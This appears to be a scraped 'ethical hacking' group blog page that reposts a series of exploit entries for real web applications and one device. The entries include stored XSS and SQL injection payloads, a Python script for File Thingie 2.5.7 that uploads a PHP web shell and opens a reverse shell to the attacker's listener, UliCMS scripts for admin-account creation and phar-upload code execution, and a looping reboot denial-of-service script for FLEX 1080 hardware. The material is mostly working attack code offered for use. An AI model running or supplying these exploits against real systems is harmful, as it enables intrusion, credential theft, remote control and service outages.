# Exploit Title: Piwigo plugin User Tag , Persistent XSS
# Date: 10 Aug, 2017
# Extension Version: 0.9.0
# Software Link: http://piwigo.org/basics/downloads
# Extension link : http://piwigo.org/ext/extension_view.php?eid=441
# Exploit Author: Touhid M.Shaikh
# Contact: http://twitter.com/touhidshaikh22
# Website: http://touhidshaikh.com/
# Category: webapps
######## Description ########
<!--
What is Piwigo ?
Piwigo is photo gallery software for the web, built by an active
community of users and developers.Extensions make Piwigo easily
customizable.Piwigo is a free and open source.
User Tag Extension in piwigo.
This plugin extends piwigo with the function to Allow visitors to add
tags to photos.
############ Requrment ##############
Admin Must allow to user or guest for a tag in User Tag plugin option.
######## Attact Description ########
<!--
User Tag Extension provides additional function on photo page for the
user to tag any name of that image.
NOTE: "test.touhidshaikh.com" this domain not registered on the internet.
This domain host on local machine.
==>START<==
Any guest visitor or registered user can perform this.
User Tag Extension adds an additional field(Keyword) on photo pages that
let you tag a User Tag on the picture for visitor and registered user.
click on that Field after that fill input text box with malicious code
javascript and press Enter its stored as a User Tag keyword.
Your Javascript Stored in Server's Database and execute every time when any
visitor visit that photo.
NOte: This is also executed in admin's dashboard when admin visit keyword
page.
-->
######## Proof of Concept ########
*****Request*****
POST /ws.php?format=json&method=user_tags.tags.update HTTP/1.1
Host: test.touhidshaikh.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:54.0) Gecko/20100101
Firefox/54.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,hi;q=0.8,ar;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://test.touhidshaikh.com/picture.php?/4/category/1
Content-Length: 83
Cookie: _ga=GA1.2.392572598.1501252105; pwg_id=gsf3gp640oupaer3cjpnl22sr0
Connection: close
image_id=4&referer=picture.php%3F%2F4%2Fcategory%2F1&tags=<script>prompt()</script>
**************************************************
******Response********
HTTP/1.1 200 OK
Date: Thu, 10 Aug 2017 11:36:24 GMT
Server: Apache/2.4.27 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 46
Connection: close
Content-Type: text/plain; charset=utf-8
{"stat":"ok","result":{"info":"Tags updated"}}
****************************************************
####################################################
Greetz: Thank You, All my Friends who support me. ;)
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863170750
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# # # # #
# Exploit Title: GIF Collection 2.0 - SQL Injection
# Dork: N/A
# Date: 10.08.2017
# Vendor Homepage : http://www.scriptfolder.com/
# Software Link: http://www.scriptfolder.com/scriptfolder-gif-collection-2-0/
# Demo: http://gif2.scriptfolder.com/
# Version: 2.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
# http://localhost/[PATH]/gifs.php?id=[SQL]
# -27++/*!11111union*/+/*!11111select*/+/*!11111concat*/(username,0x3a,password),0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137+from+users--+-
# http://localhost/[PATH]/updaterate.php?id=[SQL]
# Etc...
# # # # #
# # # # #
# Exploit Title: ImageBay 1.0 - SQL Injection
# Dork: N/A
# Date: 10.08.2017
# Vendor Homepage : http://www.scriptfolder.com/
# Software Link: http://www.scriptfolder.com/imagebay-publish-or-share-photography-and-pictures/
# Demo: http://imagebay.scriptfolder.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
# http://localhost/[PATH]/picture.php?pid=[SQL]
# -22++/*!11111union*/+/*!11111select*/+/*!11111concat*/(username,0x3a,password),0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232+from+users--+-
# http://localhost/[PATH]/updaterate.php?id=[SQL]
# Etc...
# # # # #
#!/usr/bin/python
# Exploit Title: File Thingie 2.5.7 - Arbitary File Upload to RCE
# Google Dork: N/A
# Date: 27th of April, 2023
# Exploit Author: Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)
# Software Link: https://github.com/leefish/filethingie
# Version: 2.5.7
# Tested on: N/A
# CVE: N/A
# Vulnerability originally discovered / published by Cakes
# Reference: https://www.exploit-db.com/exploits/47349
# Run a local listener on your machine and you're good to go
import os
import argparse
import requests
import random
import string
import zipfile
from urllib.parse import urlsplit, urlunsplit, quote
class Exploit:
def __init__(self, target, username, password, lhost, lport):
self.target = target
self.username = username
self.password = password
self.lhost = lhost
self.lport = lport
def try_login(self) -> bool:
self.session = requests.Session()
post_body = {"ft_user": f"{self.username}", "ft_pass": f"{self.password}", "act": "dologin"}
response = self.session.post(self.target, data=post_body)
if response.status_code == 404:
print(f"[-] 404 Not Found - The requested resource {self.target} was not found")
return False
elif response.status_code == 200:
if "Invalid username or password" in response.text:
print(f"[-] Invalid username or password")
return False
return True
def create_new_folder(self) -> bool:
# Generate random string
letters = string.ascii_letters
self.payload_filename = "".join(random.choice(letters) for i in range(16))
headers = {"Content-Type": "application/x-www-form-urlencoded"}
post_body = {f"type": "folder", "newdir": f"{self.payload_filename}", "act": "createdir", "dir": "", "submit" :"Ok"}
print(f"[*] Creating new folder /{self.payload_filename}")
response = self.session.post(self.target, headers=headers, data=post_body)
if f"index.php?dir=/{self.payload_filename}" in response.text:
print(f"[+] Created new folder /{self.payload_filename}")
return True
else:
print(f"[-] Could not create new folder /{self.payload_filename}")
return False
def create_payload(self) -> bool:
try:
with zipfile.ZipFile(f"{self.payload_filename}.zip", 'w', compression=zipfile.ZIP_DEFLATED) as zip_file:
zip_file.writestr(f"{self.payload_filename}.php", "<?php if(isset($_REQUEST[\'cmd\'])){ echo \"<pre>\"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo \"</pre>\"; die; }?>")
print(f"[+] Zipped payload to {self.payload_filename}.zip")
return True
except:
print(f"[-] Could not zip payload to {self.payload_filename}.zip")
return False
def upload_payload(self) -> bool:
# Set up the HTTP headers and data for the request
headers = {
b'Content-Type': b'multipart/form-data; boundary=---------------------------grimlockx'
}
post_body = (
'-----------------------------grimlockx\r\n'
'Content-Disposition: form-data; name="localfile-1682513975953"; filename=""\r\n'
'Content-Type: application/octet-stream\r\n\r\n'
)
post_body += (
'\r\n-----------------------------grimlockx\r\n'
'Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n'
'2000000\r\n'
'-----------------------------grimlockx\r\n'
f'Content-Disposition: form-data; name="localfile"; filename="{self.payload_filename}.zip"\r\n'
'Content-Type: application/zip\r\n\r\n'
)
# Read the zip file contents and append them to the data
with open(f"{self.payload_filename}.zip", "rb") as f:
post_body += ''.join(map(chr, f.read()))
post_body += (
'\r\n-----------------------------grimlockx\r\n'
'Content-Disposition: form-data; name="act"\r\n\r\n'
'upload\r\n'
'-----------------------------grimlockx\r\n'
'Content-Disposition: form-data; name="dir"\r\n\r\n'
f'/{self.payload_filename}\r\n'
'-----------------------------grimlockx\r\n'
'Content-Disposition: form-data; name="submit"\r\n\r\n'
'Upload\r\n'
'-----------------------------grimlockx--\r\n'
)
print("[*] Uploading payload to the target")
response = self.session.post(self.target, headers=headers, data=post_body)
if f"<a href=\"./{self.payload_filename}/{self.payload_filename}.zip\" title=\"Show {self.payload_filename}.zip\">{self.payload_filename}.zip</a>" in response.text:
print("[+] Uploading payload successful")
return True
else:
print("[-] Uploading payload failed")
return False
def get_base_url(self) -> str:
url_parts = urlsplit(self.target)
path_parts = url_parts.path.split('/')
path_parts.pop()
base_url = urlunsplit((url_parts.scheme, url_parts.netloc, '/'.join(path_parts), "", ""))
return base_url
def unzip_payload(self) -> bool:
print("[*] Unzipping payload")
headers = {"Content-Type": "application/x-www-form-urlencoded"}
post_body = {"newvalue": f"{self.payload_filename}.zip", "file": f"{self.payload_filename}.zip", "dir": f"/{self.payload_filename}", "act": "unzip"}
response = self.session.post(f"{self.target}", headers=headers, data=post_body)
if f"<p class='ok'>{self.payload_filename}.zip unzipped.</p>" in response.text:
print("[+] Unzipping payload successful")
print(f"[+] You can now execute commands by browsing {self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd=<command>")
return True
else:
print("[-] Unzipping payload failed")
return False
def execute_payload(self) -> bool:
print("[*] Trying to get a reverse shell")
cmd = quote(f"php -r \'$sock=fsockopen(\"{self.lhost}\",{self.lport});system(\"/bin/bash <&3 >&3 2>&3\");\'")
print("[*] Executing payload")
response = self.session.get(f"{self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd={cmd}")
print("[+] Exploit complete")
return True
def cleanup_local_files(self) -> bool:
if os.path.exists(f"{self.payload_filename}.zip"):
os.remove(f"{self.payload_filename}.zip")
print("[+] Cleaned up zipped payload on local machine")
return True
print("[-] Could not clean up zipped payload on local machine")
return False
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", dest="target", type=str, required=True, help="Target URL to ft2.php")
parser.add_argument("-u", "--username", dest="username", type=str, required=True, help="FileThingie username")
parser.add_argument("-p", "--password", dest="password", type=str, required=True, help="FileThingie password")
parser.add_argument("-L", "--LHOST", dest="lhost", type=str, required=True, help="Local listener ip")
parser.add_argument("-P", "-LPORT", dest="lport", type=int, required=True, help="Local listener port")
args = parser.parse_args()
exploit = Exploit(args.target, args.username, args.password, args.lhost, args.lport)
exploit.try_login()
exploit.create_new_folder()
exploit.create_payload()
exploit.upload_payload()
exploit.unzip_payload()
exploit.execute_payload()
exploit.cleanup_local_files()
#Exploit Title: Ulicms 2023.1 sniffing-vicuna - Privilege escalation
#Application: Ulicms
#Version: 2023.1-sniffing-vicuna
#Bugs: Privilege escalation
#Technology: PHP
#Vendor URL: https://en.ulicms.de/
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
#Date of found: 04-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna
import requests
new_name=input("name: ")
new_email=input("email: ")
new_pass=input("password: ")
url = "http://localhost/dist/admin/index.php"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language="
response = requests.post(url, headers=headers, data=data)
if response.status_code == 200:
print("Request is success and created new admin account")
else:
print("Request is failure.!!")
#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)
#Application: Ulicms
#Version: 2023.1-sniffing-vicuna
#Bugs: RCE
#Technology: PHP
#Vendor URL: https://en.ulicms.de/
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
#Date of found: 04-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Login to account and edit profile.
2.Upload new Avatar
3. It is possible to include the php file with the phar extension when uploading the image. Rce is triggered when we visit it again. File upload error may occur, but this does not mean that the file is not uploaded and the file location is shown in the error
payload: <?php echo system("cat /etc/passwd"); ?>
poc request :
POST /dist/admin/index.php HTTP/1.1
Host: localhost
Content-Length: 1982
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYB7QS1BMMo1CXZVy
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/dist/admin/index.php?action=admin_edit&id=12&ref=home
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv
Connection: close
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="csrf_token"
e2d428bc0585c06c651ca8b51b72fa58
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="sClass"
UserController
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="sMethod"
update
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="avatar"; filename="salam.phar"
Content-Type: application/octet-stream
<?php echo system("cat /etc/passwd"); ?>
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="edit_admin"
edit_admin
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="id"
12
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="firstname"
account1
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="lastname"
account1
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="email"
account1@test.com
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="password"
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="password_repeat"
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="group_id"
1
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="secondary_groups[]"
1
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="homepage"
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="html_editor"
ckeditor
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="admin"
1
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="default_language"
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="about_me"
------WebKitFormBoundaryYB7QS1BMMo1CXZVy--
response:
Error
GmagickException: No decode delegate for this image format (/var/www/html/dist/content/tmp/645364e62615b.phar) in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:67
Stack trace:
#0 /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php(67): Gmagick->__construct()
#1 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()
#2 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()
#3 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()
#4 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()
#5 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()
#6 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()
#7 {main}
Next Imagine\Exception\RuntimeException: Unable to open image /var/www/html/dist/content/tmp/645364e62615b.phar in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:73
Stack trace:
#0 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()
#1 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()
#2 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()
#3 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()
#4 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()
#5 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()
#6 {main}
4. Go to /var/www/html/dist/content/tmp/645364e62615b.phar (http://localhost/dist/content/tmp/645364e62615b.phar)
#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)
#Application: Ulicms
#Version: 2023.1-sniffing-vicuna
#Bugs: Stored Xss
#Technology: PHP
#Vendor URL: https://en.ulicms.de/
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
#Date of found: 04-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Go to media then to file (http://localhost/dist/admin/index.php?action=files)
2. upload malicious svg file
svg file content ===>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
poc request:
POST /dist/admin/fm/upload.php HTTP/1.1
Host: localhost
Content-Length: 663
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK3CvcSs8xZwzABCl
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/dist/admin/fm/dialog.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: last_position=%2F; 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv
Connection: close
------WebKitFormBoundaryK3CvcSs8xZwzABCl
Content-Disposition: form-data; name="fldr"
------WebKitFormBoundaryK3CvcSs8xZwzABCl
Content-Disposition: form-data; name="files[]"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
------WebKitFormBoundaryK3CvcSs8xZwzABCl--
3. Go to http://localhost/dist/content/SVG_XSS.svg
# Exploit Title: RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS)
# Discovery by: Rafael Pedrero
# Discovery Date: 2020-09-19
# Vendor Homepage: https://github.com/iwind/rockmongo/
# Software Link : https://github.com/iwind/rockmongo/
# Tested Version: 1.1.7
# Tested on: Windows 7 and 10
# Vulnerability Type: Stored Cross-Site Scripting (XSS)
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: RockMongo v1.1.7, does not sufficiently encode
user-controlled inputs, resulting in a stored and reflected Cross-Site
Scripting (XSS) vulnerability via the index.php, in multiple parameter.
Proof of concept:
Stored:
POST https://localhost/mongo/index.php?action=db.newCollection&db=local
HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://localhost
Connection: keep-alive
Referer: https://localhost/mongo/index.php?action=db.newCollection&db=local
Cookie: PHPSESSID=jtjuid60sv6j3encp3cqqps3f7; ROCK_LANG=es_es;
rock_format=json
Upgrade-Insecure-Requests: 1
Host: localhost
name=%09%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&size=0&max=0
Reflected:
https://localhost/mongo/index.php?action=collection.index&db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log
https://localhost/mongo/index.php?action=collection.index&db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E
https://localhost/mongo/index.php?action=db.index&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
http://localhost/mongo/index.php?db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll
http://localhost/mongo/index.php?db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll
http://localhost/mongo/index.php?db=local&collection=startup_log&action=collection.index&format=%27+onMouseOver%3D%27alert%281%29%3B&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll
POST http://localhost/mongo/index.php?action=login.index&host=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://localhost
Authorization: Basic cm9vdDpyb290
Connection: keep-alive
Referer: https://localhost/mongo/index.php?action=login.index&host=0
Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;
rock_format=json
Upgrade-Insecure-Requests: 1
Host: localhost
more=0&host=0&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=****&db=&lang=es_es&expire=3
POST http://localhost/mongo/index.php?action=server.command& HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://localhost
Authorization: Basic cm9vdDpyb290
Connection: keep-alive
Referer: https://localhost/mongo/index.php?action=server.command&
Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;
rock_format=json
Upgrade-Insecure-Requests: 1
Host: localhost
command=%7B%0D%0A++listCommands%3A+1%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&format=json
POST http://localhost/mongo/index.php?action=server.execute& HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
Origin: https://localhost
Authorization: Basic cm9vdDpyb290
Connection: keep-alive
Referer: https://localhost/mongo/index.php?action=server.execute&
Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;
rock_format=json
Upgrade-Insecure-Requests: 1
Host: localhost
code=function+%28%29+%7B%0D%0A+++var+plus+%3D+1+%2B+2%3B%0D%0A+++return+plus%3B%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
# Exploit Title: FLEX 1080 < 1085 Web 1.6.0 - Denial of Service
# Date: 2023-05-06
# Exploit Author: Mr Empy
# Vendor Homepage: https://www.tem.ind.br/
# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94
# Version: 1.6.0
# Tested on: Android
# CVE ID: CVE-2022-2591
#!/usr/bin/env python3
import requests
import re
import argparse
from colorama import Fore
import time
def main():
def banner():
print('''
________ _______ __
/ ____/ / / ____/ |/ /
/ /_ / / / __/ | /
/ __/ / /___/ /___ / |
/_/ /_____/_____//_/|_|
[FLEX 1080 < 1085 Web 1.6.0 - Denial of Service]
''')
def reboot():
r = requests.get(f'http://{arguments.target}/sistema/flash/reboot')
if 'Rebooting' in r.text:
pass
else:
print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware
não é vulnerável')
quit()
banner()
print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX} Iniciando o ataque')
while True:
try:
reboot()
print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX} Hardware
derrubado com sucesso!')
time.sleep(1)
except:
# print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware
está inativo')
pass
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-t','--target', action='store', help='Target',
dest='target', required=True)
arguments = parser.parse_args()
try:
main()
except KeyError:
quit()
# Exploit Title: Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)
# Date: 27-06-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://bigprof.com
# Software Download Link :
https://bigprof.com/appgini/applications/online-clinic-management-system
# Version : 2.2
# Category: Webapps
# Tested on: Windows 7 64 Bits / Windows 10 64 Bits
# CVE :
# Category: webapps
# Vulnerability Type: Stored Cross-Site Scripting
1. Description
Online Clinic Management System 2.2, does not sufficiently encode
user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS)
vulnerability via the /clinic/medical_records_view.php, in FirstRecord
parameter, GET and POST request.
2. Proof of Concept
GET:
http://127.0.0.1/clinic/medical_records_view.php?SelectedID=2&record-added-ok=5781&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=
POST:
POST http://127.0.0.1/clinic/medical_records_view.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------1512016725878
Content-Length: 1172
Origin: https://127.0.0.1
Connection: keep-alive
Referer: https://127.0.0.1/clinic/medical_records_view.php
Cookie: online_clinic_management_system=bnl1ht0a4n7snalaoqgh8f85b4;
online_clinic_management_system.dvp_expand=[%22tab_medical_records-patient%22%2C%22tab_events-name_patient%22]
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1
-----------------------------1512016725878
Content-Disposition: form-data; name="current_view"
DVP
-----------------------------1512016725878
Content-Disposition: form-data; name="SortField"
-----------------------------1512016725878
Content-Disposition: form-data; name="SelectedID"
1
-----------------------------1512016725878
Content-Disposition: form-data; name="SelectedField"
-----------------------------1512016725878
Content-Disposition: form-data; name="SortDirection"
-----------------------------1512016725878
Content-Disposition: form-data; name="FirstRecord"
"><script>alert(1);</script>
-----------------------------1512016725878
Content-Disposition: form-data; name="NoDV"
-----------------------------1512016725878
Content-Disposition: form-data; name="PrintDV"
-----------------------------1512016725878
Content-Disposition: form-data; name="DisplayRecords"
all
-----------------------------1512016725878
Content-Disposition: form-data; name="patient"
-----------------------------1512016725878
Content-Disposition: form-data; name="SearchString"
-----------------------------1512016725878--
1. Description
Online Clinic Management System 2.2, does not sufficiently encode
user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS)
vulnerability via the /clinic/patients_view.php, in FirstRecord parameter.
2. Proof of Concept
http://127.0.0.1/clinic/patients_view.php?SelectedID=1&record-added-ok=11536&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=
And Reflected Cross-Site Scripting (XSS) too.
